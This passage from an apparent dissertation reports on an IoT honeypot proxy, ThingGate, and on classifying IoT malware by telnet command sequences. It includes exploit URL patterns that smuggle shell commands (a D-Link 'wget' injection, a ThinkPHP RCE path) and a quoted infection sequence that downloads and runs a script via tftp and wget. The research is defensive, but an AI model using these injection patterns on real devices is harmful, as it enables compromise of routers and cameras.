1). Moreover, we analyzed the URL list of critical configurations and the URLs of deadly

vulnerabilities from our IoT devices. We designed and implemented the prototype of ThingGate

according to dataset 1. From November 17, 2018, to June 30, 2019, we deployed ThingGate and forwarded 19 IP addresses to conduct the evaluation experiments. The collected flow for this period is labeled as dataset 2.

Table 2 Data set for analysis.

| Data set | Number of HTTP requests | Number of honeypot IP | Time interval | Analysis subjects |
|---|---|---|---|---|
| 1 | 307,405 | 19 | 2018/09/08~2018/10/13 | Blocking list, CI-URL, and CAD |
| 2 | 1,920,653 | 19 | 2018/11/17~2019/06/30 | Blocking unwanted flow, Web tracking, Handle misplaced attack, Fabricated sensor content |

Table 3 shows the distribution of HTTP methods in dataset 2. The GET and POST methods account for the vast majority (97%) of the requests, which contain various cyber attacks against HTTP services. Moreover, some of the OPTIONS flows come from the Real Time Streaming Protocol (RTSP) [52]. The RTSP traffic indicates that some attackers or malware recognized our devices as IP Cameras and wanted to use our RTSP services. The M-SEARCH and NOTIFY traffic is based on the Universal Plug and Play protocol (UPnP) [53]. Our devices disable the UPnP port and services by default, but clients still tried to attack the UPnP service. For the PROPFIND flows, the clients blindly sent remote buffer overflow packets that target IIS 6.0 [54].

Table 3 HTTP method statistics for dataset 2.

| HTTP method | Count | Percentage (%) |
|---|---|---|
| CONNECT | 420 | 0.022 |
| GET | 1,512,526 | 78.751 |
| HEAD | 7,062 | 0.368 |
| M-SEARCH | 41,961 | 2.185 |
| NOTIFY | 67 | 0.003 |
| OPTIONS | 264 | 0.013 |
| POST | 356,272 | 18.550 |
| PROPFIND | 1,938 | 0.101 |
| PUT | 132 | 0.006 |

Table 4 presents the statistics of HTTP requests, attackers' IP addresses, and URLs. Because we forwarded fifteen IP addresses to IP Cameras A1, A2, and A3, these devices together received the most HTTP requests. However, among the devices to which only one IP address was forwarded, IP Camera C received the most HTTP requests and client IP addresses.

Table 4 Statistics of cyber attacks. Observation of 7 months.

| IoT device | Honeypot IP counts | HTTP request counts | Unique attacker IP counts | Unique URL counts |
|---|---|---|---|---|
| Router A | 1 | 17,447 | 1,808 | 6,150 |
| IP Camera A1 | 5 | 340,316 | 22,336 | 2,300 |
| IP Camera A2 | 5 | 455,639 | 23,196 | 4,546 |
| IP Camera A3 | 5 | 193,941 | 13,642 | 1,573 |
| IP Camera B | 1 | 54,024 | 4,581 | 1,740 |
| IP Camera C | 1 | 782,645 | 4,291 | 28,111 |
| IP Camera D | 1 | 76,641 | 4,422 | 1,395 |
| Total | 19 | 1,920,653 | 57,230 | 38,374 |

4.4.2. Cyber attacks against the WebUI of physical IoT devices

According to dataset 2, 1,920,653 HTTP requests were sent to attack our honeypot. Some of these attacks can only be observed with physical devices. We observed attacks similar to those reported for Ezawa's and Tamiya's honeypots [7][17]. We found that attackers attempted to capture and modify the configuration of devices, remotely control the direction and zoom of IP Cameras, peep at the live video, take snapshots from IP Cameras, and exploit the remote code execution (RCE) vulnerability of devices [55]. In addition, after the RCE attack, the attacker downloaded the device's live stream by accessing a hidden web application. The application "/video.cgi" does not appear in the source code and can be customized by width and height parameters. Table 5 shows the statistics and descriptions of the attacks against our physical devices.

A total of 49 source IPs watched the live stream of a camera. Among them, five IPs were peeping for over an hour, and the longest peeping session lasted about 18 hours. Moreover, clients from 21 source IP addresses adjusted the direction and zoom of the camera. One client from the United States applied the RCE exploit code for IP Camera C to attack IP Cameras C and D. The live stream for long term peeping, the real-time response to direction and zoom control, and the whole scenario of the RCE attack are hard to simulate with a VM-based honeypot. Our physical devices behind ThingGate successfully observed these kinds of cyber attacks.

Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP Camera A1~A3, B, C, and D.

| Category | Pathname | Description of URL | Victim devices | Request counts |
|---|---|---|---|---|
| Configuration information theft attacks | get_params.cgi | Show system variables | IP Camera A1~A3, B | 599 |
| Configuration information theft attacks | get_status.cgi | Show configuration of devices | IP Camera A1~A3, B, C, D | 1,064 |
| Modification of the configuration | /%5ccgi-bin/set_network.cgi | Set network configuration | IP Camera A3 | 83 |
| Modification of the configuration | decoder_control.cgi | Control direction and zoom | IP Camera A1~A3 | 153 |
| Snapshot attacks | snapshot.cgi | Show current image of live video stream | IP Camera A1~A3, B | 2,920 |
| Long term peeping | livestream.cgi | Show live video stream | IP Camera A1~A3 | 4,560 |
| Long term peeping | videostream.cgi | Show live video stream | IP Camera A1~A3, B | 273 |
| Remote Command Execution | /setSystemCommand | Set OS commands for execution | IP Camera C, D | 4 |

4.4.3. Blocking unwanted flow experiments

4.4.3.1. Design of experiment

We analyzed our devices and created a list of configuration URLs and dangerous vulnerabilities. The list contains 51 critical configuration URLs and one dangerous URL, and we extracted the pathnames of the configuration URLs to build a blacklist. Further, we selected target pages on the devices to replace the pathnames in the blacklist. Table 6 presents the blacklist for IP Cameras A1~A3. We deployed the blacklist in ThingGate and redirected the flow to the target pages if the incoming traffic matched the blacklist. The flow of one IP address was forwarded to each device, except for the three IP Cameras A1~A3, which received five IP addresses each (Table 4).

Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3.

| Configuration pathname | Description of pathname | Replaced pathname | Description of pathname |
|---|---|---|---|
| /set_network.cgi | change network settings | /admin2.htm | show camera status |
| /reboot.cgi | reboot camera | /admin2.htm | show camera status |
| /set_upnp.cgi | change UPnP settings | /upnp.htm | show UPnP information |
| /set_wifi.cgi | set Wi-Fi network | /wireless.htm | show Wi-Fi settings |
| /set_ddns.cgi | change dynamic DNS settings | /ddns.htm | show dynamic DNS settings |
| /set_users.cgi | change user settings | /user.htm | show user account settings |
| /restore_factory.cgi | restore factory settings | /upgrade.htm | show upgrade functions |
| /upgrade_htmls.cgi | upgrade system firmware | /upgrade.htm | show upgrade functions |
| /upgrade_htmls.cgi | upgrade WebUI | /upgrade.htm | show upgrade functions |

4.4.3.2. Experimental results

From dataset 2, we found that on June 7, 2019, an attacker from the United States accessed the Wi-Fi router in our honeypot and attempted to modify the LAN DNS setting to point to a server in Vietnam. ThingGate successfully blocked the HTTP request, filtered out the form data, and replaced the URL with another URL of the WebUI. Fig. 8 shows the details of the HTTP request.


Fig. 8 The HTTP request of a modifying configuration attack.

4.4.4. Web tracking experiments

4.4.4.1. Design of experiment

We conducted this experiment on all devices in our honeypot. As illustrated in Fig. 9,

ThingGate examined the HTTP response content from all of the devices. If the response code

equals 200 and the HTML contains the body tag, then the proxy injects fingerprinting JavaScript

codes in response. If the client can render our JavaScript codes, then the client generates a canvas

fingerprint and sends it back to ThingGate.
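
The injection rule (status code 200 and a body tag present) can be sketched as a pure function over the response. The script path `/tg-fp.js` and the function name are hypothetical; in a proxy-based prototype, a function like this would be called from the proxy's response handler.

```python
import re

BODY_OPEN = re.compile(r"<body\b[^>]*>", re.IGNORECASE)
BODY_CLOSE = re.compile(r"</body\s*>", re.IGNORECASE)

# Hypothetical script location served by the proxy itself.
SNIPPET = '<script src="/tg-fp.js"></script>'


def inject_fingerprint(status_code, html):
    """Insert the fingerprinting script into 200 responses that have a body tag."""
    if status_code != 200 or not BODY_OPEN.search(html):
        return html   # leave errors and non-HTML content untouched
    if BODY_CLOSE.search(html):
        # Place the script just before the first closing body tag.
        return BODY_CLOSE.sub(lambda m: SNIPPET + m.group(0), html, count=1)
    return html + SNIPPET   # unterminated body: append at the end
```

Clients that do not execute JavaScript simply ignore the added tag, which matches the observation that only some clients return a fingerprint.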


Fig. 9 Web Tracking flow of ThingGate

4.4.4.2. Experimental results

From dataset 2, we found that clients from 18 different source IPs successfully sent their

fingerprint values to ThingGate. We collected 26 different fingerprint values from these clients.

The geographic information on the IPs of the fingerprinted clients is displayed in Fig. 10. Of these

clients, seven were from Japan and six were from the United States. In total, 72% of the clients

were from these two countries. Four clients provided only one fingerprint value, whereas the other

14 clients provided two or more fingerprint values. Moreover, we discovered that one of the four

single-fingerprinted clients was Googlebot [56]. We verified Googlebot by using a reverse DNS

lookup on the accessing IP address according to a Google document [57] (Fig. 11). Googlebot accessed IP Camera C and sent requests to 18 different URLs of the WebUI. These URLs included the snapshot, camera parameters, DDNS, and Wi-Fi setting pages. Googlebot successfully collected the configuration information of the device, including our fabricated Wi-Fi AP list.
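
The verification of Googlebot can be sketched as a reverse DNS lookup followed by a forward confirmation. This is a minimal sketch, assuming that a genuine crawler resolves to a host under googlebot.com or google.com; the function name and the injectable resolver parameters are introduced here only so that the logic can be exercised without network access.

```python
import socket

# Domains accepted for the reverse lookup result (assumption for this sketch).
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")


def is_verified_googlebot(ip, reverse=socket.gethostbyaddr,
                          forward=socket.gethostbyname_ex):
    """Check that ip reverse-resolves to a Google host that resolves back to ip."""
    try:
        hostname = reverse(ip)[0]
    except OSError:              # no PTR record or lookup failure
        return False
    if not hostname.lower().rstrip(".").endswith(GOOGLE_SUFFIXES):
        return False
    try:
        addresses = forward(hostname)[2]
    except OSError:
        return False
    return ip in addresses       # forward lookup must confirm the same address
```

The forward confirmation matters because the owner of an IP address controls its reverse record and could otherwise claim any hostname.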


Fig. 10 Country distribution of fingerprinted clients

Fig. 11 Googlebot’s user-agent and the verifying result

Among the fingerprinted clients, three US clients sent the same two fingerprint values back to ThingGate. Table 7 presents the attack features of the three clients. Each of them visited almost all of the forwarded IP addresses of the honeypot. Moreover, each client used the HEAD method for at least 27% of its unique URLs, and at least 83% of the URLs requested by the second and third clients were also requested by the first client. The identical fingerprint values and similar features imply that the three clients belonged to the same attacker.
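
The two features compared here, the share of URLs requested with HEAD and the share of URLs common with the first client, reduce to simple set operations. The sketch below uses hypothetical function names and toy inputs rather than the honeypot logs.

```python
def url_overlap(reference_urls, other_urls):
    """Fraction of other_urls that also appear in reference_urls."""
    other = set(other_urls)
    if not other:
        return 0.0
    return len(other & set(reference_urls)) / len(other)


def head_ratio(requests):
    """Fraction of unique URLs requested at least once with the HEAD method.

    requests is a list of (method, url) pairs.
    """
    urls = {url for _, url in requests}
    head_urls = {url for method, url in requests if method.upper() == "HEAD"}
    return len(head_urls) / len(urls) if urls else 0.0
```

With the counts in Table 7, the same ratios are 62/74 and 32/33 for the common URLs and 9/33 for the smallest HEAD share.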

Table 7 Features of the fingerprinted clients.

| Source IP address | Victim devices | Unique URL count | HEAD URLs count | Common URLs with 1st IP | Attack duration |
|---|---|---|---|---|---|
| xxx.xxx.226.109 | IP Camera A1~A3, B, C, and D | 128 | 44 | N/A | 2018/12/05~2019/01/11 |
| xxx.xxx.32.101 | IP Camera A1~A3, B, C, and D | 74 | 23 | 62 | 2018/12/14~2019/01/23 |
| xxx.xxx.30.101 | IP Camera A1~A3, B, C, and D | 33 | 9 | 32 | 2018/12/28~2019/01/11 |

4.4.5. Managing misplaced attacks experiments

4.4.5.1. Design of experiment

ThingGate examines all of the incoming flow toward the 19 IP addresses. If OS commands and a link to a different site are embedded in the URL, our program redirects the flow to the CAD in an MITM manner. Next, the CI-URL analyzer analyzes the URLs and the downloaded scripts. The downloader handles all downloading tasks if our parsers extract any link during the analysis.

4.4.5.2. Experimental results

The attack flow of dataset 2 revealed that ThingGate successfully redirected the HTTP requests of 411 CI-URLs to the CAD. These CI-URLs contained 50 different URLs that exploited seven vulnerabilities. Fig. 12 depicts the vulnerability distribution of the URLs. A total of 76% of the CI-URLs used the top two vulnerabilities, which affect products of D-Link and ThinkPHP. The usage of these two vulnerabilities was about three times that of all other vulnerabilities combined. Table 8 presents information on the seven vulnerabilities, including the maker, model, version, and path of the WebUI.


Fig. 12 Vulnerability distribution of CI-URL

Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B, C, and D.

| Maker | CVE/Exploit DB | Type | Model/version | URL pattern of vulnerability |
|---|---|---|---|---|
| D-Link | OS Command Injection (Metasploit) [49] | Router | DSL-2750B | /login.cgi?cli=aa%20aa%27;wget%20 |
| ThinkPHP | Remote Code Execution [58] | Web app framework | V5.X | /index.php?s=/index/\think\app/invokefunction&function |
| AVTECH | 2015-2280 [59] | Camera/NVR/DVR | all version | /cgibin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$ |
| AirLink | 2015-2280 [60] | Camera | SkyIPCam1620W | /maker/snwrite.cgi?mac=1234& |
| Fastweb | 2018-11336 [61] | Modem | V0.0067 | /status.cgi_=1526904600131&cmd=3&nvget=login_confirm&password |
| MikroTik | 2018-14847 [62] | RouterOS | Before V6.38.4 | /jsproxy? |
| TUTOS | 'cmd.php' Remote Command Execution [63] | Software | V1.3 | /tutos/php/admin/cmd.php?cmd= |

From the 411 CI-URLs, the CAD successfully downloaded 150 different malware binaries and 23 scripts. We then searched for a suitable way to label these malware binaries. VirusTotal [64] was the platform used to obtain scan results from 66 antivirus engines. We submitted 12,821 unique malware MD5s collected by IoTPOT in 2017 and selected the most common malware family name in the VirusTotal reports as the representative malware category. We also found that Kaspersky, DrWeb, and ESET-NOD32 were the top three antivirus engines in terms of detection ratio and consistency. We then conducted a local scan of 40,203 different IoT malware binaries and found that DrWeb could label 39,245 of them, which is 97.61% of the submitted malware. The labeling performance of DrWeb surpassed that of both Kaspersky (69.82%) and ESET-NOD32 (74.57%). Therefore, we employed DrWeb to label the IoT malware collected by the CAD in dataset 2.
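
The selection of a representative family name and the labeling rate can be sketched as follows. This is an illustration only: the input is assumed to be a mapping from engine name to an already normalized family name (real engine labels are longer strings that need parsing first), and the function names are hypothetical.

```python
from collections import Counter


def representative_family(engine_labels):
    """Pick the most common family name among the engines that gave a label.

    engine_labels maps an engine name to a family name, or to None when the
    engine did not detect the sample.
    """
    votes = Counter(label.lower() for label in engine_labels.values() if label)
    if not votes:
        return None
    return votes.most_common(1)[0][0]


def labeling_rate(labeled, total):
    """Percentage of submitted binaries for which an engine produced a label."""
    return 100.0 * labeled / total
```

For example, `labeling_rate(39245, 40203)` reproduces the DrWeb figure quoted above to within rounding.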

DrWeb successfully marked 148 binaries. Fig. 13 illustrates the statistics of malware labels.

Mirai malware accounts for the vast majority of binary files (92%). We discovered that 18 Mirai

binaries employed ThinkPHP’s vulnerability to infect victim sites. Moreover, the BTCMine

malware (one binary) is a mining trojan. The attacker of the BTCMine malware also utilized the

vulnerability of ThinkPHP to attack our honeypot.


Fig. 13 Statistic of malware labels

4.4.6. Fabricated sensor information experiment

4.4.6.1. Design of experiment

We selected the WebUI of all of the IP Cameras as victim devices that we would like to protect.

ThingGate monitored the flow of 18 IPs forwarded to these cameras. If clients requested the web

page of scanning Wi-Fi information, we replaced the information with fabricated information. Fig.

14 depicts the webpages before and after modification with ThingGate.


Fig. 14 Fabricated Wi-Fi AP list

4.4.6.2. Experimental results

In dataset 2, we found that ThingGate successfully sent fabricated Wi-Fi information to 44 different clients in 80 HTTP responses. Table 9 presents, for some of these attackers, the geographical location, the number of requests sent, and the duration of the visit to our honeypot. The Googlebot client sent only 23 HTTP requests in one day.

Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP Camera A1~A3, B, C, and D.

| Client | Source IP | Country | Requests for Wi-Fi | Total request count | Attack duration |
|---|---|---|---|---|---|
| Client A | aaa.aaa.202.28 | USA | 3 | 2,704 | 2018/12/12~2018/12/12 |
| Client B | bbb.bbb.169.38 | USA | 3 | 4,167 | 2018/12/23~2018/12/23 |
| Client C | ccc.ccc.226.5 | USA | 6 | 3,476 | 2018/12/17~2019/01/12 |
| Client D | ddd.ddd.89.58 | China | 1 | 537 | 2019/01/11~2019/01/11 |
| Client E | eee.eee.148.116 | China | 3 | 2,333 | 2018/11/19~2018/11/19 |
| Client F | fff.fff.15.51 | France | 3 | 98 | 2019/01/07~2019/01/08 |
| Client G | ggg.249.79.85* | USA | 1 | 23 | 2018/11/17~2018/11/17 |

*Client G is Googlebot.

4.4.7. Stress testing against IoT devices

4.4.7.1. Design of experiment

According to dataset 2, each device receives about 0.33 HTTP requests per minute on average. Taking the ceiling of 0.33 gives one HTTP request per minute. On this basis, we assume that up to five users may watch the live stream of an IP Camera concurrently. Our test employs five Chrome browsers (v72.0.3626.121) on five computers to log in to the IP Cameras and view the pages that contain live streams. We conduct the test both through ThingGate and by accessing the WebUI directly, and we repeat each condition ten times.

4.4.7.2. Experimental results

Table 10 shows the test results for access through ThingGate and for direct forwarding. The results show that attackers would receive the same rendered video under the two conditions. IP Camera B supports only four clients downloading live stream data at the same time. Therefore, our clients sent 50 requests under each condition and received only 40 responses with live streams.

Table 10 Results of stress testing with and without ThingGate.

| IoT device | Path | Clients downloading video through ThingGate | Clients downloading video directly |
|---|---|---|---|
| IP Camera A1 | /monitor2.htm | 50 | 50 |
| IP Camera B | /main.htm | 40/50 | 40/50 |
| IP Camera C | /video.cgi* | 50 | 50 |
| IP Camera D | /top.htm | 50 | 50 |

*The certificates in the default firmware of IP Camera C are out of date. Hence, browsers including IE, Firefox, Chrome, and Safari block the rendering of the live stream on the default web pages. We therefore used the hidden live stream application (/video.cgi), which was employed by the attacker in Section 4.4.2, for the evaluation.

4.5. Discussion

From the observation of cyber attacks in dataset 2, our honeypot successfully collected attacks against physical IoT devices through ThingGate. These attacks, such as peeping at video streams, controlling the direction of the camera, and conducting an RCE attack and then downloading the live stream via a hidden web application, are hard to simulate with a virtual machine. From the blocking unwanted flow experiment, we showed that ThingGate can block attacks that change critical configurations. In addition, from the fabricated sensor information experiment, we found that 44 clients requested the Wi-Fi AP information web page. Of the 44 clients, 41 employed a predefined list to scan victims, two were human-like attackers, and one was Googlebot. From the web tracking experiment, we successfully extended a tracking function to IoT devices and tracked an attacker who employed three US IP addresses to visit our honeypot. Regarding the misplaced attacks, ThingGate extracted 411 CI-URLs and downloaded 149 different malware binaries and 23 scripts. Moreover, we found that 18 binaries exploited the vulnerability of ThinkPHP, which is not an IoT device but a web application framework. The abuse of HTTP port 80 is becoming more serious. From the stress testing results, attackers receive the same rendered live stream from the IP Cameras through ThingGate. Hence, we can build bare-metal IoT honeypots together with ThingGate.

4.5.1. Limitations

ThingGate has some limitations, many of which come from the design of the CI-URL analyzer. First, the URL parser only analyzes CI-URLs in which the attacker embedded OS commands in the URL; our program does not yet check other header fields or form data. Second, the script parser can handle only several kinds of shell scripts. A Linux sandbox could resolve more types of scripts. However, the sandbox must be monitored and implemented with a high-security design because of threats such as BrickerBot. Third, our web tracking function relies on JavaScript and canvas fingerprinting. Therefore, if a client cannot render the JavaScript code, it cannot trigger the fingerprint function.


Chapter 5.

IoT Malware Analysis and New Pattern Discovery Through

Sequence Analysis Using Meta-Feature Information

5.1. Introduction

Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and

buildings, that are embedded with electronics, sensors, and networking abilities. Connectivity

enables these objects to collect and exchange data for further application. However, in October

2016, the IoT malware called Mirai executed the massive distributed denial of service (DDoS)

attack against Dyn DNS, enlisting approximately 100,000 Mirai IoT Botnet nodes for a reported

attack rate of up to 1.2 Tbps [2]. According to the report from Kaspersky in Sept. 2018, Mirai is

still the most popular IoT malware family for cybercriminals (20.9%). Moreover, the most popular

attack and infection vector against devices remains the telnet service (75.4%) [8]. Although

signature-based detection methods are sensitive to the structures of existing malware samples,

even a small change in a malware program could alter its signature sufficiently to thwart antivirus

detection. Therefore, an urgent necessity is to analyze IoT malware and related logs to recognize

the behavior of unfamiliar threats and thus assist organizations in mounting a timely and

appropriate defense.

Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is projected

to grow to 20.8 billion by 2020 [1]. Embedding information and communication technology into

devices thus represents an ongoing trend. The nature of IoT presents challenges in establishing a

comprehensive security mechanism. These challenges arising from IoT devices are as follows:

1. Most IoT devices are always online.

2. Most utilize simple, low-level hardware.

3. IoT devices have a variety of CPU architectures and OS.


4. Antivirus and monitoring services are lacking.

5. Diverse developers result in a lack of unified standards.

6. IoT malware attack patterns are continually evolving, with an extremely large damage scope.

Few IoT devices are protected by antivirus software. To analyze the threat of IoT malware, Pa et al. [4] proposed IoTPOT, a honeypot that observes cyber attacks against IoT devices, focusing on telnet-based attacks; it emulates IoT devices that accept telnet protocol connections. When attackers access IoTPOT, it records the entire netflow and maintains logs for further analysis, such as downloading samples. Since 2015, 6,016,030 download attempts from 1,085,664 different hosts have been observed and over 40,000 malware samples downloaded. Moreover, 124,517,838 telnet session logs have been collected, recording all the shell command input sent by the attackers. IoTPOT thus represents a useful method of collecting samples, analyzing threat behavior, and understanding cyber attacks in IoT. However, the enormous data size results in huge time and resource costs when analyzing attack patterns and their relationships. There is an urgent need for an appropriate view that analyzes the incoming data in depth and utilizes our resources efficiently.

The purpose of this study is to apply machine learning techniques to create a simplified and

accurate view of cyber attacks in IoT. The method determines categories of malware by analyzing

its meta-features and command sequences. Its contributions may be summarized as follows:

1. We proved that similar IoT malware binaries conduct similar infection commands. Moreover,

through similarity analysis of command sequences, we can identify the malware category of

unknown threats.

2. By clustering telnet logs, we discovered a new DoS cyber attack executed using pure Linux

commands, without IoT malware binaries.

3. Using malware samples from the IoT honeypot, our proposed method could identify malware

categories with 96.70% accuracy.


5.2. Methods

5.2.1 Preliminaries

All the data in this research were observed in IoTPOT [4]. We used VirusTotal malware labels

as the ground truth of data. Command sequences were extracted from IoTPOT telnet session logs

and concatenated into a sequence according to the input order. A command sequence could

contain single or multiple shell command clauses. In this study, we mainly analyzed infection

sequences according to target, purpose, and frequency, and found that most of them consisted of

five types of atomic behavior:

1. Authentication behavior

Login with ID and password

2. Resource scan behavior

Resource scan is a command that finds available functions and writable folders in an IoT

device; for example, “/bin/busybox Mirai” tests “/bin/busybox,” and “/bin/busybox cat

/proc/mounts” aims to find a writable folder.

3. Change directory behavior

Changes the directory/folder of the terminal’s shell.

4. Create or download files behavior

Uses “echo” to produce binary files or “wget,” “tftp” to download files.

5. Execution behavior

Uses “sh” to execute downloaded binary or script files.

Malware sometimes executes “chmod” to alter file privileges, “history –c –r” to purge the system log, “rm” to remove files, and “exit” to terminate the session. These commands may be executed multiple times to ensure that the infection is successful. Only a few “kill” and “killall” commands were found in our data; they mostly appeared together with the “while true;” loop and “wget” commands.

We collected 69 million command sequences containing the Mirai signature. All of these sequences were of the recognition type, which contains only login credentials and several Linux commands such as "enable, system, shell, sh, and /bin/busybox echo." These commands were not related to malware binaries, and each sequence carried too little information for analysis. IoTPOT did not capture any Mirai infection command sequences because dozens of verification steps are performed by the attacker’s server, each of which must receive a corresponding response, such as the “echo,” “cat /etc/mounts,” and “cp /bin/echo” commands. We determined these steps based on the Mirai source code [65][66]. To observe Mirai’s infection command sequence, we developed new honeypots consisting of physical IoT devices that could respond correctly to Mirai. We thereby captured 578,671 Mirai command sequences from December 11, 2016, to February 28, 2017, approximately 32% of which were infection command sequences executed by Mirai and 68% of which were simple recognition command sequences. We therefore narrowed the scope of the command sequences, focusing on those related to downloaded malware binaries or posing a serious cybersecurity threat. Table 11 shows the results of other research [4] with a comparison of labels.

Table 11 Comparison of labels and infection command sequence [4].

| Label | Pattern of command sequence | Number of attacks/day (average) |
|---|---|---|
| Bashlite | Using a downloaded shell script, kill previously running malicious process, download malware binaries of different CPU architectures, and block 23/TCP to prevent other infections. Run all downloaded malware binaries. | 290 |
| Nttpd | Change directory to /tmp. Check whether shell can be used by echoing “welcome.” Run binaries. | 48 |
| ZORRO | Check whether “wget” command is usable. Check whether busybox shell can be used by echoing “ZORRO.” Remove various commands and files under /usr/bin/, /bin, /var/run/, and /dev. Copy /bin/sh to random filename. Append series of binaries to random filename and make attacker’s own shell. Using attacker’s own shell, download binary. The IP address and port number of the malware download server can be seen in the command. Run binaries. | 2232 |

In this study, VirusTotal was used to obtain scan results from 66 antivirus engines. We sent

12,821 unique malware MD5s from IoTPOT and received 3,306 reports. We then chose the most

frequent malware family name as the representative malware category. Table 12 shows the top

five antivirus engines for IoT malware.
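The majority-vote labeling step described above can be illustrated with a minimal sketch. It assumes that each engine's raw detection string has already been normalized to a family name; the function name `representative_family` and the engine names used below are hypothetical and only serve the illustration.

```python
from collections import Counter

def representative_family(engine_labels):
    """Return the most frequent family name among engine verdicts.

    engine_labels maps an engine name to a normalized family name,
    or to None when the engine did not detect the sample (assumed format).
    """
    families = [family for family in engine_labels.values() if family]
    if not families:
        return None
    # most_common(1) yields the family with the highest vote count;
    # ties are resolved by first occurrence.
    return Counter(families).most_common(1)[0][0]

# Hypothetical verdicts for one sample.
verdicts = {"EngineA": "Mirai", "EngineB": "Mirai",
            "EngineC": "Bashlite", "EngineD": None}
label = representative_family(verdicts)
```

In practice the normalization of vendor-specific detection names is the harder part; it is left out here because the text does not describe it.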

Table 12 Top 5 antivirus engines for IoT malware.

| AV / Consistency (%) | Mirai (207) | Bashlite (2733) | Hajime (5) | Tsunami (48) |
|---|---|---|---|---|
| Kaspersky | 98.06 | 100 | 100 | 89.58 |
| DrWeb | 96.61 | 97.36 | 100 | 60.41 |
| ESET-NOD32 | 98.55 | 93.66 | 100 | 91.66 |
| Sophos | 85.50 | 89.82 | 80 | 95.83 |
| Avast | 85.02 | 88.58 | 20 | 35.41 |

We chose Kaspersky, DrWeb, and ESET-NOD32 to locally scan 40,203 different IoT malware

binaries and found that DrWeb could label 39,245 of them, representing 97.61% of the submitted


malware and thus surpassing Kaspersky (69.82%) and ESET-NOD32 (74.57%). Therefore, we

employed DrWeb to label the IoT malware as the basis for malware categories.

5.2.2. Encoding and measurement of command sequences

Data encoding. To process numerous complex sequences, we used a simplified representative form called extracted command tokens (ECTs). For example, the command sequence [‘cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; tftp -r tftp.sh -g test.test.org; sh tftp.sh; busybox wget http’] can be expressed as the encoded sequence “ccccctsw,” which represents each command by a single letter, such as “w” for “wget” and “c” for “cd.” We made a table mapping each of the 51 commands to a corresponding letter and then applied a natural language processing algorithm to classify the ECTs. An example of a command mapping table is shown in Table 13. These commands were derived from historical observation data in the IoTPOT.

Table 13 An example of the command mapping table.

| Command | Token | Command | Token |
|---|---|---|---|
| /bin/busybox | B | exit | q |
| cd | C | chmod | c |
| enable | e | echo | E |
| sh | h | wget | w |
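The encoding step can be sketched as follows. This is a minimal illustration, not the dissertation's implementation: the four-entry `TOKEN_MAP` is a hypothetical mapping chosen to reproduce the “ccccctsw” example in the text (the full 51-command table is not reproduced here), and both the clause-splitting rule and the treatment of a leading `busybox` wrapper are assumptions.

```python
import re

# Hypothetical mapping chosen to reproduce the "ccccctsw" example;
# the real table covers 51 commands.
TOKEN_MAP = {"cd": "c", "tftp": "t", "sh": "s", "wget": "w"}
# Assumption: a leading busybox wrapper is skipped so the applet is encoded.
WRAPPERS = {"busybox", "/bin/busybox"}

def encode_ect(command_sequence, token_map=TOKEN_MAP, unknown="?"):
    """Encode a shell command sequence as one letter per command clause."""
    # Split on the shell separators ||, &&, ; and | (assumed clause boundaries).
    clauses = re.split(r"\|\||&&|;|\|", command_sequence)
    letters = []
    for clause in clauses:
        words = clause.split()
        if not words:
            continue
        if words[0] in WRAPPERS and len(words) > 1:
            words = words[1:]
        letters.append(token_map.get(words[0], unknown))
    return "".join(letters)

sequence = ("cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; "
            "tftp -r tftp.sh -g test.test.org; sh tftp.sh; busybox wget http")
ect = encode_ect(sequence)
```

Commands missing from the map are encoded as `?` in this sketch so that unexpected input stays visible instead of being silently dropped.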

Comparison of distance measures. The following six distances [67] are applied to measure the similarity between different categories. Each distance is defined as one minus the corresponding similarity.

1. Cosine: Cosine similarity is a measure of similarity between two non-zero vectors of an inner product space that measures the cosine of the angle between them. The strings are first transformed into vectors of occurrences of k-shingles (sequences of k characters) [68]. In the n-dimensional space, the similarity between the two strings is the cosine of their respective vectors. The cosine similarity between two strings s1 and s2 is defined as follows:

$$\cos(v_1, v_2) = \frac{v_1 \cdot v_2}{|v_1| \cdot |v_2|}$$

where v1 and v2 are the vectors of k-shingle occurrences for strings s1 and s2. In our system, we set k = 3.

2. Trigram: We apply the trigram distance to determine how similar two strings are. The similarity between two strings X and Y is defined as the ratio of twice the number of trigrams shared by the two strings to the total number of trigrams in both strings [69]:

$$\frac{2 \times |\mathrm{trigrams}(X) \cap \mathrm{trigrams}(Y)|}{|\mathrm{trigrams}(X)| + |\mathrm{trigrams}(Y)|}$$

where trigrams(X) is the multi-set of letter trigrams in X.

3. Normalized longest common subsequence (NLCS): The longest common subsequence can be considered the sequential analog of the cosine distance between two ordered sets. Thus, given two sequences X and Y, of lengths m and n respectively, we calculate the NLCS by the formula [70]:

$$\mathrm{NLCS} = \frac{\mathrm{length}(\mathrm{LCS})}{m + n} + \varepsilon,$$

where ε is a constant whose value is 0.5 if the first characters of the strings, x1 ∈ X and y1 ∈ Y, match; otherwise it is 0.

4. Metric longest common subsequence (MLCS): This measures the degree of similarity between the two series. The metric is defined as follows [71]:

$$\mathrm{MLCS} = \frac{\mathrm{length}(\mathrm{LCS})}{m + n}$$

5. Normalized Levenshtein Distance (NLD): The sum of the length normalized Levenshtein distance between the words occupying the same meaning slot divided by the number of word pairs. The Levenshtein distance between two strings x, y (of length |x|, |y| respectively) is given by lev_{x,y}(|x|, |y|) as follows:

$$\mathrm{lev}_{x,y}(i, j) = \begin{cases} \max(i, j) & \text{if } \min(i, j) = 0, \\ \min \begin{cases} \mathrm{lev}_{x,y}(i - 1, j) + 1 \\ \mathrm{lev}_{x,y}(i, j - 1) + 1 \\ \mathrm{lev}_{x,y}(i - 1, j - 1) + 1_{(x_i \neq y_j)} \end{cases} & \text{otherwise,} \end{cases}$$

where 1_{(x_i ≠ y_j)} is the indicator function equal to 0 when xi = yj and equal to 1 otherwise. Normalized Levenshtein is defined by the formula [72]:

$$\mathrm{NormalizedLev}_{x,y} = \frac{\mathrm{lev}_{x,y}(|x|, |y|)}{\max(|x|, |y|)}$$

